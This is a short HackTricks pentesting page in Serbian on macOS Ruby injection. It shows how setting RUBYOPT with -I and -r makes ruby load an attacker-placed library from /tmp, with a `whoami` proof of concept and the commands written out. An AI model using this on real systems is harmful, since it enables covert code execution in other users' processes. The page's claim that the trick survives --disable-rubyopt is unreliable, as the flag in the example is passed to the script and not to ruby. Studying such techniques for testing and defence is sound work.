HackTricksmacOS Ruby Applications Injection
Tip
Učite i vežbajte AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
HackTricks Training Azure Red Team Expert (AzRTE)
Podržite HackTricks
- Proverite planove pretplate!
- Pridružite se 💬 Discord grupi ili telegram grupi ili pratite nas na Twitteru 🐦 @hacktricks_live.
- Podelite hakerske trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.
RUBYOPT
Korišćenjem ove env promenljive moguće je dodati nove parametre u ruby svaki put kada se izvršava. Iako parametar -e ne može biti korišćen za specificiranje ruby koda za izvršavanje, moguće je koristiti parametre -I i -r da se doda nova fascikla u putanju za učitavanje biblioteka i zatim specificirati biblioteku za učitavanje.
Kreirajte biblioteku inject.rb u /tmp:
puts `whoami`
Kreirajte bilo gde Ruby skriptu kao:
puts 'Hello, World!'
Zatim napravite proizvoljni ruby skript koji ga učitava sa:
RUBYOPT="-I/tmp -rinject" ruby hello.rb
Zanimljiva činjenica, funkcioniše čak i sa parametrom --disable-rubyopt:
RUBYOPT="-I/tmp -rinject" ruby hello.rb --disable-rubyopt
Tip
Učite i vežbajte AWS Hacking:
Učite i vežbajte GCP Hacking:Podržite HackTricks
- Proverite planove pretplate!
- Pridružite se 💬 Discord grupi ili telegram grupi ili pratite nas na Twitteru 🐦 @hacktricks_live.
- Podelite hakerske trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.